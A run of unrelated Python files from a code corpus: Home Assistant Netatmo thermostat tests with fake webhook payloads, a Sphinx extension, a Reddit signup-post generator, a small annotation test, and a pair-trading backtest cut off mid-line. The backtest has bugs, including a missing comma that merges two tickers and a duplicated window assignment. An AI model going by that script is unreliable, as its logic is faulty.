"""Test service with frost guard preset for thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
# Test service setting the preset mode to "frost guard"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{
ATTR_ENTITY_ID: climate_entity_livingroom,
ATTR_PRESET_MODE: PRESET_FROST_GUARD,
},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode change to "Frost Guard"
response = {
"event_type": "therm_mode",
"home": {"id": "91763b24c43d3e344f424e8b", "therm_mode": "hg"},
"mode": "hg",
"previous_mode": "schedule",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Frost Guard"
)
# Test service setting the preset mode to "frost guard"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{
ATTR_ENTITY_ID: climate_entity_livingroom,
ATTR_PRESET_MODE: PRESET_SCHEDULE,
},
blocking=True,
)
await hass.async_block_till_done()
# Test webhook thermostat mode change to "Schedule"
response = {
"event_type": "therm_mode",
"home": {"id": "91763b24c43d3e344f424e8b", "therm_mode": "schedule"},
"mode": "schedule",
"previous_mode": "hg",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
async def test_service_preset_modes_thermostat(hass, config_entry, netatmo_auth):
"""Test service with preset modes for thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"]
== "Schedule"
)
# Test service setting the preset mode to "away"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_PRESET_MODE: PRESET_AWAY},
blocking=True,
)
await hass.async_block_till_done()
# Fake webhook thermostat mode change to "Away"
response = {
"event_type": "therm_mode",
"home": {"id": "91763b24c43d3e344f424e8b", "therm_mode": "away"},
"mode": "away",
"previous_mode": "schedule",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "auto"
assert (
hass.states.get(climate_entity_livingroom).attributes["preset_mode"] == "away"
)
# Test service setting the preset mode to "boost"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_PRESET_MODE: PRESET_BOOST},
blocking=True,
)
await hass.async_block_till_done()
# Test webhook thermostat mode change to "Max"
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2746182631",
"name": "Livingroom",
"type": "livingroom",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [
{"id": "12:34:56:00:01:ae", "name": "Livingroom", "type": "NATherm1"}
],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_livingroom).state == "heat"
assert hass.states.get(climate_entity_livingroom).attributes["temperature"] == 30
async def test_webhook_event_handling_no_data(hass, config_entry, netatmo_auth):
"""Test service and webhook event handling with erroneous data."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
# Test webhook without home entry
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
response = {
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
# Test webhook with different home id
response = {
"home_id": "3d3e344f491763b24c424e8b",
"room_id": "2746182631",
"home": {
"id": "3d3e344f491763b24c424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [],
"modules": [],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
# Test webhook without room entries
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [],
"modules": [],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
async def test_service_schedule_thermostats(hass, config_entry, caplog, netatmo_auth):
"""Test service for selecting Netatmo schedule with thermostats."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_livingroom = "climate.netatmo_livingroom"
# Test setting a valid schedule
with patch(
"pyatmo.thermostat.AsyncHomeData.async_switch_home_schedule"
) as mock_switch_home_schedule:
await hass.services.async_call(
"netatmo",
SERVICE_SET_SCHEDULE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_SCHEDULE_NAME: "Winter"},
blocking=True,
)
await hass.async_block_till_done()
mock_switch_home_schedule.assert_called_once_with(
home_id="91763b24c43d3e344f424e8b", schedule_id="b1b54a2f45795764f59d50d8"
)
# Fake backend response for valve being turned on
response = {
"event_type": "schedule",
"schedule_id": "b1b54a2f45795764f59d50d8",
"previous_schedule_id": "59d32176d183948b05ab4dce",
"push_type": "home_event_changed",
}
await simulate_webhook(hass, webhook_id, response)
assert (
hass.states.get(climate_entity_livingroom).attributes["selected_schedule"]
== "Winter"
)
# Test setting an invalid schedule
with patch(
"pyatmo.thermostat.AsyncHomeData.async_switch_home_schedule"
) as mock_switch_home_schedule:
await hass.services.async_call(
"netatmo",
SERVICE_SET_SCHEDULE,
{ATTR_ENTITY_ID: climate_entity_livingroom, ATTR_SCHEDULE_NAME: "summer"},
blocking=True,
)
await hass.async_block_till_done()
mock_switch_home_schedule.assert_not_called()
assert "summer is not a valid schedule" in caplog.text
async def test_service_preset_mode_already_boost_valves(
hass, config_entry, netatmo_auth
):
"""Test service with boost preset for valves when already in boost mode."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
assert hass.states.get(climate_entity_entrada).state == "auto"
assert (
hass.states.get(climate_entity_entrada).attributes["preset_mode"]
== "Frost Guard"
)
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 7
# Test webhook valve mode change to "Max"
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
# Test service setting the preset mode to "boost"
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_entrada, ATTR_PRESET_MODE: PRESET_BOOST},
blocking=True,
)
await hass.async_block_till_done()
# Test webhook valve mode change to "Max"
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "heat"
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 30
async def test_service_preset_mode_boost_valves(hass, config_entry, netatmo_auth):
"""Test service with boost preset for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Test service setting the preset mode to "boost"
assert hass.states.get(climate_entity_entrada).state == "auto"
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 7
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: climate_entity_entrada, ATTR_PRESET_MODE: PRESET_BOOST},
blocking=True,
)
await hass.async_block_till_done()
# Fake backend response
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "max",
"therm_setpoint_end_time": 1612749189,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "max",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "heat"
assert hass.states.get(climate_entity_entrada).attributes["temperature"] == 30
async def test_service_preset_mode_invalid(hass, config_entry, caplog, netatmo_auth):
"""Test service with invalid preset."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_SET_PRESET_MODE,
{ATTR_ENTITY_ID: "climate.netatmo_cocina", ATTR_PRESET_MODE: "invalid"},
blocking=True,
)
await hass.async_block_till_done()
assert "Preset mode 'invalid' not available" in caplog.text
async def test_valves_service_turn_off(hass, config_entry, netatmo_auth):
"""Test service turn off for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Test turning valve off
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_OFF,
{ATTR_ENTITY_ID: climate_entity_entrada},
blocking=True,
)
await hass.async_block_till_done()
# Fake backend response for valve being turned off
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "off",
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "off",
"event_type": "set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "off"
async def test_valves_service_turn_on(hass, config_entry, netatmo_auth):
"""Test service turn on for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Test turning valve on
await hass.services.async_call(
CLIMATE_DOMAIN,
SERVICE_TURN_ON,
{ATTR_ENTITY_ID: climate_entity_entrada},
blocking=True,
)
await hass.async_block_till_done()
# Fake backend response for valve being turned on
response = {
"room_id": "2833524037",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "home",
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "auto"
async def test_get_all_home_ids():
"""Test extracting all home ids returned by NetAtmo API."""
# Test with backend returning no data
assert climate.get_all_home_ids(None) == []
# Test with fake data
home_data = Mock()
home_data.homes = {
"123": {"id": "123", "name": "Home 1", "modules": [], "therm_schedules": []},
"987": {"id": "987", "name": "Home 2", "modules": [], "therm_schedules": []},
}
expected = ["123", "987"]
assert climate.get_all_home_ids(home_data) == expected
async def test_webhook_home_id_mismatch(hass, config_entry, netatmo_auth):
"""Test service turn on for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
assert hass.states.get(climate_entity_entrada).state == "auto"
# Fake backend response for valve being turned on
response = {
"room_id": "2833524037",
"home": {
"id": "123",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "home",
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "home",
"event_type": "cancel_set_point",
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "auto"
async def test_webhook_set_point(hass, config_entry, netatmo_auth):
"""Test service turn on for valves."""
with selected_platforms(["climate"]):
await hass.config_entries.async_setup(config_entry.entry_id)
await hass.async_block_till_done()
webhook_id = config_entry.data[CONF_WEBHOOK_ID]
climate_entity_entrada = "climate.netatmo_entrada"
# Fake backend response for valve being turned on
response = {
"room_id": "2746182631",
"home": {
"id": "91763b24c43d3e344f424e8b",
"name": "MYHOME",
"country": "DE",
"rooms": [
{
"id": "2833524037",
"name": "Entrada",
"type": "lobby",
"therm_setpoint_mode": "home",
"therm_setpoint_temperature": 30,
}
],
"modules": [{"id": "12:34:56:00:01:ae", "name": "Entrada", "type": "NRV"}],
},
"mode": "home",
"event_type": "set_point",
"temperature": 21,
"push_type": "display_change",
}
await simulate_webhook(hass, webhook_id, response)
assert hass.states.get(climate_entity_entrada).state == "heat"
|
Danielhiversen/home-assistant
|
tests/components/netatmo/test_climate.py
|
Python
|
apache-2.0
| 26,123
|
import os
from example_builder import ExampleBuilder
RST_TEMPLATE = """
.. _%(sphinx_tag)s:
%(docstring)s
%(image_list)s
.. raw:: html
<div class="toggle_trigger"><a href="#">
**Code output:**
.. raw:: html
</a></div>
<div class="toggle_container">
.. literalinclude:: %(stdout)s
.. raw:: html
</div>
<div class="toggle_trigger" id="start_open"><a href="#">
**Python source code:**
.. raw:: html
</a></div>
<div class="toggle_container">
.. literalinclude:: %(fname)s
:lines: %(end_line)s-
.. raw:: html
</div>
<div align="right">
:download:`[download source: %(fname)s] <%(fname)s>`
.. raw:: html
</div>
"""
def main(app):
target_dir = os.path.join(app.builder.srcdir, 'book_figures')
source_dir = os.path.abspath(app.builder.srcdir + '/../' + 'examples')
try:
plot_gallery = eval(app.builder.config.plot_gallery)
except TypeError:
plot_gallery = bool(app.builder.config.plot_gallery)
if not os.path.exists(source_dir):
os.makedirs(source_dir)
if not os.path.exists(target_dir):
os.makedirs(target_dir)
EB = ExampleBuilder(source_dir, target_dir,
execute_files=plot_gallery,
contents_file='contents.txt',
dir_info_file='README.rst',
dir_footer_file='FOOTER.rst',
sphinx_tag_base='book_fig',
template_example=RST_TEMPLATE)
EB.run()
def setup(app):
app.connect('builder-inited', main)
#app.add_config_value('plot_gallery', True, 'html')
|
cigroup-ol/metaopt
|
docs/_extensions/gen_figure_rst.py
|
Python
|
bsd-3-clause
| 1,626
|
#!/usr/bin/python
from participantCollection import ParticipantCollection
import string
import re
import datetime
import pyperclip
# Edit Me!
# Remember, this is during signup, so current month is not June, it's May.
currentMonthTotalDays = 31
currentMonthURL = "https://www.reddit.com/r/pornfree/comments/5lefq1/stay_clean_january_this_thread_updated_daily/"
currentMonthIndex = datetime.date.today().month
currentMonthPenultimateDayIndex = currentMonthTotalDays - 1
currentMonthName = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June', 7: 'July', 8: 'August', 9: 'September', 10: 'October', 11: 'November', 12: 'December'}[currentMonthIndex]
nextMonthIndex = currentMonthIndex % 12 + 1
nextMonthName = {1: 'January', 2: 'February', 3: 'March', 4: 'April', 5: 'May', 6: 'June', 7: 'July', 8: 'August', 9: 'September', 10: 'October', 11: 'November', 12: 'December'}[nextMonthIndex]
uppercaseMonth = string.upper(nextMonthName)
currentDayOfMonthIndex = datetime.date.today().day
currentDayOfMonthName = {1: 'first', 2: 'second', 3: 'third', 4: 'fourth', 5: 'fifth', 6: 'sixth', 7: 'seventh', 8: 'eighth', 9: 'ninth', 10: 'tenth', 11: 'eleventh', 12: 'twelfth', 13: 'thirteenth', 14: 'fourteenth', 15: 'fifteenth', 16: 'sixteenth', 17: 'seventeenth', 18: 'eighteenth', 19: 'nineteenth', 20: 'twentieth', 21: 'twenty-first', 22: 'twenty-second', 23: 'twenty-third', 24: 'twenty-fourth', 25: 'twenty-fifth', 26: 'twenty-sixth', 27: 'twenty-seventh', 28: 'twenty-eighth', 29: 'twenty-ninth', 30: 'thirtieth', 31: 'thirty-first'}[currentDayOfMonthIndex]
currentDayOfWeekName = {0: 'Monday', 1: 'Tuesday', 2: 'Wednesday', 3: 'Thursday', 4: 'Friday', 5: 'Saturday', 6: 'Sunday'}[datetime.date.today().weekday()]
# TODO: testing
# currentDayOfMonthIndex = 28
participants = ParticipantCollection()
initialNumber = participants.size()
def templateForParticipants():
answer = ""
answer += "Here are the **INITIAL_NUMBER participants** who have already signed up:\n\n"
for participant in participants.participants:
answer += "/u/" + participant.name
answer += "\n\n"
return answer
def templateForTooEarly():
answer = ""
answer += "(Too early. Come back on CURRENT_MONTH_NAME " + str(currentMonthTotalDays - 6) + ")\n"
return answer
def templateForFirstSignupDay():
answer = ""
answer += "STAY CLEAN UPPERCASE_MONTH! Sign up here! (CURRENT_MONTH_NAME CURRENT_DAY_OF_MONTH_INDEX)\n"
answer += "Hey everybody, we had a great turnout for [Stay Clean CURRENT_MONTH_NAME](CURRENT_MONTH_URL) - let's see if we can knock it out of the park for NEXT_MONTH_NAME. Have you been clean for the month of CURRENT_MONTH_NAME? Great! Join us here, and let's keep our streak going. Did you slip in CURRENT_MONTH_NAME? Then NEXT_MONTH_NAME is your month to shine, and we will gladly fight the good fight along with you. Did you miss out on the CURRENT_MONTH_NAME challenge? Well then here is your opportunity to join us.\n"
answer += "\n"
answer += "If you would like to be included in this challenge, please post a brief comment to this thread, and I will include you. After midnight, NEXT_MONTH_NAME 1, the sign up window will close, and the challenge will begin."
return answer
def templateForMiddleSignupDays():
answer = ""
answer += "STAY CLEAN UPPERCASE_MONTH! Sign up here! (CURRENT_MONTH_NAME CURRENT_DAY_OF_MONTH_INDEX)\n"
answer += "Hey everybody, so far **INITIAL_NUMBER participants** have signed up. Have you been clean for **[the month of CURRENT_MONTH_NAME](CURRENT_MONTH_URL)**? Great! Join us here, and let's keep our streak going. Did you slip in CURRENT_MONTH_NAME? Then NEXT_MONTH_NAME is your month to shine, and we will gladly fight the good fight along with you. Did you miss out on the CURRENT_MONTH_NAME challenge? Well then here is your opportunity to join us.\n"
answer += "\n"
answer += "If you would like to be included in this challenge, please post a brief comment to this thread (if you haven't already done so on an earlier signup thread), and I will include you. After midnight, NEXT_MONTH_NAME 1, the sign up window will close, and the challenge will begin.\n"
answer += "\n"
answer += templateForParticipants()
return answer
def templateForLastSignupDay():
answer = ""
answer += "LAST CHANCE TO SIGN UP FOR STAY CLEAN UPPERCASE_MONTH! Sign up here!\n"
answer += "The Stay Clean NEXT_MONTH_NAME challenge **begins tomorrow**! So far, we have **INITIAL_NUMBER participants** signed up. If you would like to be included in the challenge, please post a brief comment to this thread (if you haven't already done so on an earlier signup thread), and we will include you. After midnight tonight, we will not be accepting any more participants. I will create the official update post tomorrow.\n"
answer += "\n"
answer += templateForParticipants()
return answer
def templateToUse():
if currentDayOfMonthIndex <= (currentMonthTotalDays - 7):
return templateForTooEarly()
elif currentDayOfMonthIndex == (currentMonthTotalDays - 6):
return templateForFirstSignupDay()
elif (currentMonthTotalDays - 5) <= currentDayOfMonthIndex <= (currentMonthTotalDays - 1):
return templateForMiddleSignupDays()
elif currentMonthTotalDays == currentDayOfMonthIndex:
return templateForLastSignupDay()
def stringToPrint():
answer = templateToUse()
answer = re.sub('INITIAL_NUMBER', str(initialNumber), answer)
answer = re.sub('CURRENT_MONTH_INDEX', str(currentMonthIndex), answer)
answer = re.sub('CURRENT_MONTH_TOTAL_DAYS', str(currentMonthTotalDays), answer)
answer = re.sub('CURRENT_MONTH_PENULTIMATE_DAY_INDEX', str(currentMonthPenultimateDayIndex), answer)
answer = re.sub('CURRENT_MONTH_NAME', currentMonthName, answer)
answer = re.sub('CURRENT_MONTH_URL', currentMonthURL, answer)
answer = re.sub('NEXT_MONTH_INDEX', str(nextMonthIndex), answer)
answer = re.sub('NEXT_MONTH_NAME', nextMonthName, answer)
answer = re.sub('CURRENT_DAY_OF_MONTH_INDEX', str(currentDayOfMonthIndex), answer)
answer = re.sub('CURRENT_DAY_OF_MONTH_NAME', currentDayOfMonthName, answer)
answer = re.sub('CURRENT_DAY_OF_WEEK_NAME', currentDayOfWeekName, answer)
answer = re.sub('UPPERCASE_MONTH', uppercaseMonth, answer)
return answer
outputString = stringToPrint()
print "============================================================="
print outputString
print "============================================================="
pyperclip.copy(outputString)
|
foobarbazblarg/stayclean
|
stayclean-2017-february/display-during-signup.py
|
Python
|
mit
| 6,610
|
from rambutan3.check_args.annotation.ANY import ANY
from rambutan3.check_args.annotation.INT import INT
from rambutan3.check_args.annotation.ONE_OR_MORE_OF import ONE_OR_MORE_OF
def test():
assert ONE_OR_MORE_OF(ANY).matches(None)
assert ONE_OR_MORE_OF(ANY).matches([None])
assert ONE_OR_MORE_OF(INT).matches(123)
assert not ONE_OR_MORE_OF(INT).matches('abc')
assert ONE_OR_MORE_OF(INT).matches([123])
assert not ONE_OR_MORE_OF(INT).matches(['abc'])
assert not ONE_OR_MORE_OF(INT).matches([])
assert not ONE_OR_MORE_OF(INT).matches(set())
assert ONE_OR_MORE_OF(INT).matches({1,2,3})
|
kevinarpe/kevinarpe-rambutan3
|
tests/check_args/annotation/test_ONE_OR_MORE_OF.py
|
Python
|
gpl-3.0
| 621
|
# -*- coding: utf-8 -*-
"""
Created on Wed Aug 30 19:07:37 2017
@author: AmatVictoriaCuramIII
"""
import numpy as np
import random as rand
import pandas as pd
import time as t
#from DatabaseGrabber import DatabaseGrabber
from YahooGrabber import YahooGrabber
from ListPairs import ListPairs
Empty = []
Start = t.time()
Counter = 0
Counter2 = 0
iterations = range(0, 200)
Dataset2 = pd.DataFrame()
#Input
tickers = ('TLT', 'SPY', 'TMF' 'AAPL', 'PBF', 'UVXY', '^VIX', 'GLD', 'SLV',
'JO','CORN', 'DBC', 'SOYB')
#Make all pairs in final list
MajorList = ListPairs(tickers)
#Here we go
#Brute Force Optimization
for m in MajorList:
Dataset = pd.DataFrame()
Ticker1 = m[0]
Ticker2 = m[1]
TAG = m[0] + '/' + m[1]
Dataset = pd.DataFrame()
Portfolio = pd.DataFrame()
#pull online data, change to local for testing
Asset1 = YahooGrabber(Ticker1)
Asset2 = YahooGrabber(Ticker2)
#get log returns
Asset1['LogRet'] = np.log(Asset1['Adj Close']/Asset1['Adj Close'].shift(1))
Asset1['LogRet'] = Asset1['LogRet'].fillna(0)
Asset2['LogRet'] = np.log(Asset2['Adj Close']/Asset2['Adj Close'].shift(1))
Asset2['LogRet'] = Asset2['LogRet'].fillna(0)
#Match lengths
trim = abs(len(Asset1) - len(Asset2))
if len(Asset1) == len(Asset2):
pass
else:
if len(Asset1) > len(Asset2):
Asset1 = Asset1[trim:]
else:
Asset2 = Asset2[trim:]
#
for i in iterations:
Counter = Counter + 1
aa = rand.random() * 2 #uniformly distributed random number 0 to 2
a = aa - 1 #a > 1 indicating long position in a
bb = rand.random()
if bb >= .5:
bb = 1
else:
bb = -1
b = bb * (1 - abs(a))
#you can change c and d to 0 by default if you want to just go flat
cc = rand.random() * 2 #uniformly distributed random number 0 to 2
c = cc - 1 #cc > 1 indicating long position in c
dd = rand.random() * 2
if dd >= 1:
edd = 1
else:
edd = -1
d = (dd - 1)
if abs(c) + abs(d) > 1:
continue
e = rand.randint(3,25)
f = rand.randint(3,25)
g = rand.randint(3,60)
h = rand.randint(3,60)
if g < e:
continue
if h < f:
continue
window = int(e)
window2 = int(f)
window3 = int(g)
window3 = int(h)
n = .1 - (rand.random())/5
o = .1 - (rand.random())/5
Asset1['smallSMA'] = Asset1['Adj Close'].rolling(window=e, center=False).mean()
Asset2['smallSMA'] = Asset2['Adj Close'].rolling(window=f, center=False).mean()
Asset1['largeSMA'] = Asset1['Adj Close'].rolling(window=g, center=False).mean()
Asset2['largeSMA'] = Asset2['Adj Close'].rolling(window=h, center=False).mean()
Asset1['SMAspread'] = Asset1['smallSMA'] - Asset1['largeSMA']
Asset2['SMAspread'] = Asset2['smallSMA'] - Asset2['largeSMA']
Asset1['Position'] = a
Asset1['Position'] = np.where(Asset1['SMAspread'].shift(1) > n,
c,a)
Asset1['Pass'] = (Asset1['LogRet'] * Asset1['Position'])
Asset2['Position'] = b
Asset2['Position'] = np.where(Asset2['SMAspread'].shift(1) > o,
d,b)
Asset2['Pass'] = (Asset2['LogRet'] * Asset2['Position'])
Portfolio['Asset1Pass'] = (Asset1['Pass']) #* (-1) #Pass a short position?
Portfolio['Asset2Pass'] = (Asset2['Pass']) #* (-1) #Pass a short position?
Portfolio['LongShort'] = Portfolio['Asset1Pass'] + Portfolio['Asset2Pass']
if Portfolio['LongShort'].std() == 0:
continue
Portfolio['Multiplier'] = Portfolio['LongShort'].cumsum().apply(np.exp)
drawdown = 1 - Portfolio['Multiplier'].div(Portfolio['Multiplier'].cummax())
MaxDD = max(drawdown)
if MaxDD > float(.5):
continue
dailyreturn = Portfolio['LongShort'].mean()
if dailyreturn < .0003:
continue
dailyvol = Portfolio['LongShort'].std()
sharpe =(dailyreturn/dailyvol)
Portfolio['Multiplier'] = Portfolio['LongShort'].cumsum().apply(np.exp)
drawdown = 1 - Portfolio['Multiplier'].div(Portfolio['Multiplier'].cummax())
MaxDD = max(drawdown)
print(Counter)
Empty.append(a)
Empty.append(b)
Empty.append(c)
Empty.append(d)
Empty.append(e)
Empty.append(f)
Empty.append(g)
Empty.append(h)
Empty.append(n)
Empty.append(o)
Empty.append(sharpe)
Empty.append(sharpe/MaxDD)
Empty.append(dailyreturn/MaxDD)
Empty.append(MaxDD)
Emptyseries = pd.Series(Empty)
Dataset[0] = Emptyseries.values
Dataset[i] = Emptyseries.values
Empty[:] = []
#find optimal parameters from pair
z1 = Dataset.iloc[11]
w1 = np.percentile(z1, 80)
v1 = [] #this variable stores the Nth percentile of top performers
DS1W = pd.DataFrame() #this variable stores your financial advisors for specific dataset
for l in z1:
if l > w1:
v1.append(l)
for j in v1:
r = Dataset.columns[(Dataset == j).iloc[11]]
DS1W = pd.concat([DS1W,Dataset[r]], axis = 1)
y = max(z1)
k = Dataset.columns[(Dataset == y).iloc[11]] #this is the column number
kfloat = float(k[0])
End = t.time()
print(End-Start, 'seconds later')
Dataset[TAG] = Dataset[kfloat]
Dataset2[TAG] = Dataset[TAG]
Dataset2 = Dataset2.rename(columns = {Counter2:TAG})
Counter2 = Counter2 + 1
# print(Dataset[TAG])
Portfolio2 = pd.DataFrame()
#find some winning parameters
z1 = Dataset2.iloc[11]
w1 = np.percentile(z1, 99)
v1 = [] #this variable stores the Nth percentile of top performers
winners = pd.DataFrame() #this variable stores your financial advisors for specific dataset
for l in z1:
if l > w1:
v1.append(l)
for j in v1:
r = Dataset2.columns[(Dataset2 == j).iloc[11]]
winners = pd.concat([winners,Dataset2[r]], axis = 1)
y = max(z1)
k = Dataset2.columns[(Dataset2 == y).iloc[11]] #this is the name of the pair
kfloat = str(k[0])
#most likely, you will want to export to csv for further future investigation
#print(Dataset[TAG])
num = kfloat.find('/')
num2 = num + 1
#you will need to re-call the Asset1 and Asset2 time series and log returns start here!!!
Asset3 = YahooGrabber(kfloat[:num])
Asset4 = YahooGrabber(kfloat[num2:])
trim = abs(len(Asset3) - len(Asset4))
if len(Asset3) == len(Asset4):
pass
else:
if len(Asset3) > len(Asset4):
Asset3 = Asset3[trim:]
else:
Asset4 = Asset4[trim:]
#get log returns
Asset3['LogRet'] = np.log(Asset3['Adj Close']/Asset3['Adj Close'].shift(1))
Asset3['LogRet'] = Asset3['LogRet'].fillna(0)
Asset4['LogRet'] = np.log(Asset4['Adj Close']/Asset4['Adj Close'].shift(1))
Asset4['LogRet'] = Asset4['LogRet'].fillna(0)
window = int((Dataset2[kfloat][4]))
window2 = int((Dataset2[kfloat][5]))
window3 = int((Dataset2[kfloat][6]))
window4 = int((Dataset2[kfloat][7]))
threshold = Dataset2[kfloat][8]
threshold2 = Dataset2[kfloat][9]
Asset3['smallSMA'] = Asset3['Adj Close'].rolling(window=window, center=False).mean()
Asset4['smallSMA'] = Asset4['Adj Close'].rolling(window=window2, center=False).mean()
Asset3['largeSMA'] = Asset3['Adj Close'].rolling(window=window3, center=False).mean()
Asset4['largeSMA'] = Asset4['Adj Close'].rolling(window=window4, center=False).mean()
Asset3['SMAspread'] = Asset3['smallSMA'] - Asset3['largeSMA']
Asset4['SMAspread'] = Asset4['smallSMA'] - Asset4['largeSMA']
Asset3['Position'] = (Dataset2[k[0]][0])
Asset3['Position'] = np.where(Asset3['SMAspread'].shift(1) > threshold,
